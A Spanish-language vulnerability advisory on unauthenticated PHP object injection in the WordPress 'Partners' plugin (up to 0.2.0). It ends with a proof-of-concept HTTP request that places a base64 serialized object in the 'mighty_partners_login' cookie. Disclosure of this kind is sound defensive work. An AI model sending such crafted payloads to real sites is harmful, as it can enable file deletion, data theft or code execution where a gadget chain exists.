
Partners <= 0.2.0 - Inyección de Objetos PHP No Autenticado
Partners <= 0.2.0 - Inyección de Objetos PHP No Autenticada
El plugin Partners para WordPress es vulnerable a la Inyección de Objetos PHP en versiones hasta la 0.2.0 inclusive, a través de la deserialización de entrada no confiable. Esto permite que atacantes no autenticados inyecten un Objeto PHP. No hay una cadena POP conocida presente en el software vulnerable. Si hay una cadena POP presente a través de un plugin o tema adicional instalado en el sistema objetivo, podría permitir al atacante eliminar archivos arbitrarios, recuperar datos sensibles o ejecutar código.
GET /partners/ HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: mighty_partners_login=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=